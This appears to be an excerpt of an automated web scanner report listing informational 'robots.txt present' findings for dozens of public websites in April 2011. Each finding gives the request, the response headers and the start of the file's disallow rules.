The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.confirmit.com

Response

HTTP/1.1 200 OK
Content-Length: 374
Content-Type: text/plain
Last-Modified: Wed, 01 Sep 2010 19:59:08 GMT
Accept-Ranges: bytes
ETag: "dcbd7f23104acb1:2f65"
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:06:52 GMT
Connection: close

# robots.txt for http://www.confirmit.com/
User-agent: *
Sitemap: http://www.confirmit.com/sitemap.xml
Sitemap: http://www.confirmit-horizons.com/sitemap_ch.xml
Disallow:/12/
Disallow:/11/
Disal
...[SNIP]...

24.202. http://www.consumeraffairs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.consumeraffairs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.consumeraffairs.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:08 GMT
Server: Apache
Last-Modified: Wed, 30 Mar 2011 14:00:36 GMT
ETag: "5cc0ac-a5-49fb399d9e900"
Accept-Ranges: bytes
Content-Length: 165
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /admin/
Disallow: /beta/
Disallow: /cms/
Disallow: /reputation-management/users/
Disallow: /reputation-management/admin/
Disallow: /scripts/

24.203. http://www.consumerreports.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.consumerreports.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.consumerreports.org

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise
Date: Sat, 02 Apr 2011 13:38:39 GMT
Content-type: text/plain
Last-modified: Fri, 11 Mar 2011 19:09:10 GMT
Content-length: 11143
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /access/
Disallow: /Avantgo/
Disallow: /ProdSelect/
Disallow: /Special/Avantgo/
Disallow: /cro/home-garden/sports-exercise-equipment/infomercial-exercise-2-08/
Disallow: /cro/h
...[SNIP]...

24.204. http://www.consumersearch.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.consumersearch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.consumersearch.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix) PHP/5.2.6 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Wed, 19 Jan 2011 17:52:28 GMT
Content-Type: text/plain
Cache-Control: max-age=1150853
Expires: Fri, 15 Apr 2011 21:14:47 GMT
Date: Sat, 02 Apr 2011 13:33:54 GMT
Content-Length: 2063
Connection: close

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

24.205. http://www.contactatonce.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contactatonce.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.contactatonce.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:57 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Aug 2009 16:00:08 GMT
ETag: "e0-4706718de3200"
Accept-Ranges: bytes
Content-Length: 224
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Sat, 09 Apr 2011 13:45:57 GMT
Vary: Accept-Encoding,User-Agent
Pragma: public
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /carsoup/
Disallow: /icon/
Disallow: /help/
Disallow: /install/
Disallow: /lexus/
Disallow: /onecommand/
Disallow: /order/
Disallow: /setup/
Disallow: /ukorder/
Disallow: /imag
...[SNIP]...

24.206. http://www.contactmusic.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contactmusic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.contactmusic.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:38 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 22 Feb 2011 12:26:06 GMT
ETag: "1401eeb-359b6-49cde159b1380"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Cache-Control: no-store
Pragma: no-cache
Expires: Tue, 31 Dec 2019 12:34:56 GMT
x-cdn: CMcdn
Connection: close

User-agent: *
Disallow: /0/
Disallow: /index.nsf/singleindexc_new/
Disallow: /new/home.nsf/webpagestmp/
Disallow: /index.nsf/event-gallery-index_new/
Disallow: /index.nsf/gallery-index_new/
Disallow:
...[SNIP]...

24.207. http://www.contextoptional.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contextoptional.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.contextoptional.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:14:29 GMT
Server: Apache
Last-Modified: Sun, 18 Jul 2010 03:02:18 GMT
ETag: "c41c23f-130-48ba0ae0da280"
Accept-Ranges: bytes
Content-Length: 304
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

24.208. http://www.continental.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.continental.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.continental.com

Response

HTTP/1.0 200 OK
Content-Length: 1517
Content-Type: text/plain
Last-Modified: Fri, 29 Oct 2010 18:49:47 GMT
Accept-Ranges: bytes
ETag: "a5579f9a77cb1:32ae"
X-Powered-By: ASP.NET
Server: Continental Airlines, Inc.
Cache-Control: max-age=1800
Date: Sat, 02 Apr 2011 14:15:45 GMT
Connection: close

User-agent: *
Disallow: /web/en-US/apps/booking/flight/fareCalendar.aspx
Disallow: /web/en-us/apps/booking/flight/farecalendar.aspx
Disallow: /web/en-US/apps/vendors/emailForm.aspx
Disallow: /web/
...[SNIP]...

24.209. http://www.coolmath-games.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolmath-games.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coolmath-games.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Sat, 02 Apr 2011 13:24:57 GMT
Content-Type: text/plain
Content-Length: 330
Last-Modified: Tue, 09 Feb 2010 21:35:28 GMT
Connection: close
Accept-Ranges: bytes

User-agent: TurnitinBot
User-agent: sitecheck.internetseer.com
User-agent: RB2B-bot
User-agent: SBIder
User-agent: OmniExplorer_Bot
User-agent: Baiduspider+
User-agent: Becomebot
Disallow: /

User-age
...[SNIP]...

24.210. http://www.coolmath.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolmath.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coolmath.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:16 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 06 Feb 2010 23:13:26 GMT
ETag: "366bdcf-14a-b71c9180"
Accept-Ranges: bytes
Content-Length: 330
Connection: close
Content-Type: text/plain

User-agent: TurnitinBot
User-agent: sitecheck.internetseer.com
User-agent: RB2B-bot
User-agent: SBIder
User-agent: OmniExplorer_Bot
User-agent: Baiduspider+
User-agent: Becomebot
Disallow: /

User-age
...[SNIP]...

24.211. http://www.coolmath4kids.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolmath4kids.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coolmath4kids.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:49 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 09 Feb 2010 05:35:07 GMT
ETag: "2c3f09d-14a-47ccd8c0"
Accept-Ranges: bytes
Content-Length: 330
Connection: close
Content-Type: text/plain

User-agent: TurnitinBot
User-agent: sitecheck.internetseer.com
User-agent: RB2B-bot
User-agent: SBIder
User-agent: OmniExplorer_Bot
User-agent: Baiduspider+
User-agent: Becomebot
Disallow: /

User-age
...[SNIP]...

24.212. http://www.coolsavings.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolsavings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coolsavings.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:28 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Connection: close
Content-Type: text/html

User-agent: *
Disallow:
Sitemap: sitemap.php

24.213. http://www.cornell.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cornell.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cornell.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:20 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l JRun/4.0
Last-Modified: Thu, 10 Feb 2011 19:56:22 GMT
ETag: "2d9774-7a-49bf2f9cf91dd"
Accept-Ranges: bytes
Content-Length: 122
Content-Type: text/plain
Set-Cookie: BALANCEID=balancer.cf068; path=/; domain=.cornell.edu
Connection: close

User-agent: *
Crawl-Delay: 6
Disallow: /trustees/eupdate/
Disallow: /print.cfm
Disallow: /events/
Disallow: /presentation/

24.214. http://www.costco.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.costco.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.costco.com

Response

HTTP/1.1 200 OK
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:39:31 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 28 Mar 2011 22:23:08 GMT
ETag: "02eecb696edcb1:18d3"
Content-Length: 1269
Vary: Accept-Encoding, User-Agent

User-Agent: *
Disallow: /bin/
Disallow: /images/
Disallow: /Checkout/
Disallow: /Coremetrics/
Disallow: /OrderStatus/
Disallow: /Pharmacy/Banner.asp
Disallow: /Pharmacy/FrameMaster.asp
Disallo
...[SNIP]...

24.215. http://www.couponcabin.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.couponcabin.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.couponcabin.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:28 GMT
Server: Apache
Last-Modified: Sat, 02 Apr 2011 06:21:56 GMT
ETag: "403ab26-22a-49fe98b0e2900"
Accept-Ranges: bytes
Content-Length: 554
Vary: Accept-Encoding
X-backend: nyapp02
Connection: close
Content-Type: text/plain; charset=UTF-8

SITEMAP: http://www.couponcabin.com/sitemap_index.xml.gz

User-agent: *
Disallow: /r/
Disallow: /s/
Disallow: /cc-rc/
Disallow: /cc-rd/
Disallow: /cc-rs/
Disallow: /cc-sd/
Disallow: /cc-gh/
Disallow:
...[SNIP]...

24.216. http://www.couponmountain.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.couponmountain.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.couponmountain.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:49 GMT
Server: Apache
Last-Modified: Mon, 28 Mar 2011 01:12:12 GMT
ETag: "ec71f-42c-49f80a227f300"
Accept-Ranges: bytes
Content-Length: 1068
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow:/merchant.php
Disallow:/category.php
Disallow:/tag.php
Disallow:/frame.php
Disallow:/popup.php
Disallow:/account.php
Disallow:/redir.php
Disallow:/click_coupon.php
Disallow:/for
...[SNIP]...

24.217. http://www.coupons.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coupons.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coupons.com

Response

HTTP/1.1 200 OK
Content-Length: 91
Content-Type: text/plain
Last-Modified: Mon, 29 Nov 2010 06:32:19 GMT
Accept-Ranges: bytes
ETag: "b147562c8f8fcb1:3f3e"
Server: Microsoft-IIS/6.0
p3p: CP="ALL DSP COR LAW CURa ADMa DEVa TAIa IVAi CONi OUR BUS IND PHY ONL COM NAV DEM OTC"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:45:26 GMT
Connection: keep-alive
CI_SVR_ID: 10/11
Set-Cookie: NSC_Njdsptjuft-IUUQ=ffffffffc3a0141a45525d5f4f58455e445a4a423660;Version=1;Max-Age=600;path=/

User-agent: *
Disallow: /RSSlink.asp
Disallow: /terms/
Disallow: /privacy/
Allow: /


24.218. http://www.coveritlive.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coveritlive.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coveritlive.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian) PHP/5.2.6-2+b1 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Sat, 27 Nov 2010 22:11:20 GMT
ETag: "7a0009-16f-496101e5e9200"-gzip
Content-Type: text/plain
X-Cache-Lookup: MISS from localhost.localdomain:80
Date: Sat, 02 Apr 2011 13:56:28 GMT
Content-Length: 367
Connection: close

User-agent: *
Disallow: /index2.php
Disallow: /index2.php/
Disallow: /mobile.php
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallo
...[SNIP]...

24.219. http://www.cowboylyrics.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cowboylyrics.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cowboylyrics.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:07:59 GMT
Server: Apache/2.2.4
Last-Modified: Fri, 16 Feb 2007 06:00:00 GMT
ETag: "a220a-21-af9ad800"
Accept-Ranges: bytes
Content-Length: 33
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /guest

24.220. http://www.cox.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cox.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cox.net

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:54 GMT
Server: Apache
Last-Modified: Thu, 16 Mar 2006 18:22:50 GMT
ETag: "1a373-158c-c7a9b280"
Accept-Ranges: bytes
Content-Length: 5516
Keep-Alive: timeout=30, max=28800
Connection: Keep-Alive
Content-Type: text/plain

###
#Unsafe robots to keep away
###
User-agent: Aqua_Products
Disallow: /

User-agent: asterias
Disallow: /

User-agent: b2w/0.1
Disallow: /

User-agent: BackDoorBot/1.0
Disallow: /

User-agent: Black
...[SNIP]...

24.221. http://www.cracked.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cracked.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cracked.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.6
Last-Modified: Tue, 28 Dec 2010 16:53:45 GMT
ETag: "b9007-72-4987b4baef840"-gzip
Content-Type: text/plain
Expires: Sat, 02 Apr 2011 13:33:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:33:15 GMT
Content-Length: 114
Connection: close
Set-Cookie: BIGipServerorigin.cracked.com=1066797322.20480.0000; path=/

User-agent: *
Disallow:/craptions/archive/
Disallow:/craptions/category/
Disallow: /search/
Disallow: /forums/

24.222. http://www.crackle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crackle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.crackle.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 25 Feb 2011 01:20:08 GMT
Accept-Ranges: bytes
ETag: "2ccc11248ad4cb1:bdd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Connection: close
Date: Sat, 02 Apr 2011 13:44:16 GMT
Age: 8643
Content-Length: 232

User-agent: *
Disallow: /rss/
Disallow: /App/
Disallow: /app/
Disallow: /Report/
Disallow: /ps3/
Disallow: /gtv/
Disallow: /chromewebapp/
Disallow: /members/
Sitemap: http://crackle.com/profi
...[SNIP]...

24.223. http://www.craigslist.ca/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.craigslist.ca
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.craigslist.ca

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Fri, 18 Dec 2009 01:10:13 GMT
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 13:36:20 GMT
Vary: Accept-Encoding
Content-Length: 665
Content-Type: text/plain
Server: Apache
X-Pad: avoid browser bug

##############################
# Exclude robots from these

User-agent: YahooFeedSeeker
Disallow: /forums
Disallow: /res/
Disallow: /post
Disallow: /email.friend
Disallow: /reply
Disallow: /?flagCode

...[SNIP]...

24.224. http://www.crateandbarrel.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crateandbarrel.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.crateandbarrel.com

Response

HTTP/1.0 200 OK
Content-Length: 197
Content-Type: text/plain
Last-Modified: Mon, 08 Nov 2010 21:22:02 GMT
Accept-Ranges: bytes
ETag: "57e225fc8a7fcb1:233b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:05:36 GMT
Connection: close

User-agent: *
Disallow: /account
Disallow: /bin
Disallow: /checkout
Disallow: /js
Disallow: /manager
Disallow: /gift-registry/guest/
Disallow: /Gift-Registry/Guest/
Disallow: /search.aspx?

24.225. http://www.creditreport.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditreport.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.creditreport.com

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 629
Content-Type: text/plain
Last-Modified: Thu, 03 Mar 2011 16:57:11 GMT
ETag: "80db79c4d9cb1:1510"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:31:39 GMT
Set-Cookie: BIGipServercreditreport-web-pool=170986250.39455.0000; path=/
X-PvInfo: [S10203.C6506.A6016.RA0.G0.UACBD09A4].[OT/plaintext.OG/documents]

User-agent: *
Disallow: /rt/
Disallow: /rt
Disallow: /rt?
Disallow: /dni/
Disallow: /DNI/
Disallow: /Dni/
Disallow: /Order1.aspx
Disallow: /Order2.aspx
Disallow: /images/
Disallow: /Images/
...[SNIP]...

24.226. http://www.csmonitor.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.csmonitor.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Fri, 19 Feb 2010 15:46:40 GMT
Served-By:
Content-Type: text/plain
Cache-Control: max-age=14012
Expires: Sat, 02 Apr 2011 17:20:45 GMT
Date: Sat, 02 Apr 2011 13:27:13 GMT
Content-Length: 2969
Connection: close

User-agent: Mediapartners-Google*
Disallow: /includes/
Disallow: /keepalive.html

User-agent: *
Disallow: /sudoku
Disallow: /404
Disallow: /Innovation/Horizons/2009/1123/which-best-buy-black-friday-sa
...[SNIP]...

24.227. http://www.curse.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.curse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.curse.com

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServer=1932476484.20480.0000; path=/
Content-Type: text/plain
Last-Modified: Mon, 21 Mar 2011 14:54:11 GMT
Accept-Ranges: bytes
ETag: "b62e64d6d7e7cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:39:41 GMT
Xonnection: Xeep-alive
Content-Length: 160

...User-agent: *
Disallow: /ajax/

User-agent: *
Disallow: /api/

User-agent: *
Disallow: /ControlPanel/

User-agent: Mediapartners-Google*
Disallow:

24.228. http://www.cvs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cvs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cvs.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:43 GMT
Server: Apache
Last-Modified: Mon, 06 Dec 2010 21:25:52 GMT
Accept-Ranges: bytes
Content-Length: 28
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:34:43 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: 008
Disallow: /

24.229. http://www.dailyfinance.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailyfinance.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dailyfinance.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=UTF-8
Content-Length: 3909
Set-Cookie: JSESSIONID=C26ED679911F6740DD169B20FBC44CF1; Path=/sitemap_df
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive

User-agent: googlebot
Disallow: /historical-prices/
Disallow: /caw/
Disallow: /ukw/
Disallow: /usw/portfolios/
Disallow: /tools/static_c/
Disallow: /portfolios/
Disallow: /lookup/
Disallow: /lookuppop
...[SNIP]...

24.230. http://www.dailykos.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailykos.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dailykos.com

Response

HTTP/1.0 200 OK
Server: lighttpd/1.4.29-devel-2776M
Vary: Accept-Encoding
Content-Type: text/plain
Date: Sat, 02 Apr 2011 14:09:30 GMT
Accept-Ranges: bytes
ETag: "2004376725"
Connection: close
Last-Modified: Sun, 13 Feb 2011 09:23:27 GMT
Content-Length: 2420

User-agent: Mediapartners-Google*
Disallow:

User-Agent: Googlebot
#Disallow: /
Disallow: /comments
Disallow: /user
Disallow: /poll
Disallow: /print
Disallow: /search
Disallow: /part
Disallow: /ajax


...[SNIP]...

24.231. http://www.dailymail.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailymail.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dailymail.co.uk

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=ISO-8859-1
Content-Language: en-GB
Expires: Sat, 02 Apr 2011 13:43:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:43:54 GMT
Content-Length: 6258
Connection: close
Set-Cookie: JSESSIONID=471A74475C35B52E49346C845D2BE9A6; Path=/


# Robots.txt for http://www.dailymail.co.uk/
# All robots will spider the domain

# Begin standard rules

# Meltwater block
User-agent: Meltwater
Disallow: /

...[SNIP]...

24.232. http://www.dailymotion.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailymotion.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dailymotion.com

Response

HTTP/1.1 200 OK
Server: DMS/1.0.42
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
P3p: policyref="http://www.dailymotion.com/w3c/p3p.xml", CP="IDC DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sat, 02 Apr 2011 12:43:38 GMT
Keep-Alive: timeout=60, max=4994
X-DM-Cache: DONT
Accept-Ranges: bytes
ETag: "1e42c3-70a-49fc959e0f300"
Connection: close
Last-Modified: Thu, 31 Mar 2011 15:57:32 GMT
Content-Length: 1802

User-agent: *
Disallow: /masscast/
Disallow: /rss/
Disallow: /&tid=generator
Disallow: /edit/
Disallow: /tags/
Disallow: /cdn/
Disallow: /family_filter
Disallow: /pageitem
Disallow: /contacts/
Disallo
...[SNIP]...

24.233. http://www.datehookup.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.datehookup.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.datehookup.com

Response

HTTP/1.1 200 OK
Content-Length: 175
Content-Type: text/plain
Last-Modified: Tue, 27 Jul 2010 22:04:09 GMT
Accept-Ranges: bytes
ETag: "703db7a3d72dcb1:171c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:04:44 GMT
Connection: close

User-agent: *
Disallow: /*ga_flow
Disallow: /Send.aspx
Disallow: /send.aspx
Disallow: /1016760/

User-agent: MediaPartners-Google
User-agent: Adsbot-Google
Disallow:

24.234. http://www.deadline.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deadline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.deadline.com

Response

HTTP/1.0 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny8
Last-Modified: Fri, 01 Apr 2011 21:25:03 GMT
X-Server-Name: 00-www-adriana
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:52:44 GMT
Content-Length: 224
Connection: close

User-agent: *
Disallow: /print-post/
Disallow: /wp-admin/
   
User-agent: Googlebot-Mobile
Disallow: /
       
Sitemap: http://www-deadline-com.vimg.net/sitemap.xml
Sitemap: http://www-deadline-com.vimg.net/
...[SNIP]...

24.235. http://www.dealer.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dealer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dealer.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 19 May 2010 16:24:52 GMT
ETag: "1b87e6-2b-486f4e5c6dd00"
Accept-Ranges: bytes
Content-Length: 43
Content-Type: text/plain; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Date: Sat, 02 Apr 2011 14:16:55 GMT
Connection: close

User-agent: *
Disallow: /designs/
Allow: /

24.236. http://www.dealtime.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dealtime.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dealtime.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Sat, 02 Apr 2011 13:38:15 GMT
Connection: close

User-agent: *
Disallow: /sdcSeo
Disallow: /*?all
Disallow: /*&all

24.237. http://www.dell.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dell.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dell.com

Response

HTTP/1.1 200 OK
Content-Length: 3737
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: stop_mobi=; path=/
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:26:07 GMT
Connection: close

User-agent: *
Disallow:
Allow:/*/compare.aspx*s=biz*
Allow:/*/compare.aspx*s=hied*
Allow:/*/compare.aspx*s=hea*
Allow:/*/compare.aspx*s=fed*
Allow:/*/compare.aspx*s=slg*
Allow:/*/compare.aspx*s
...[SNIP]...

24.238. http://www.demdex.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.demdex.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.demdex.net
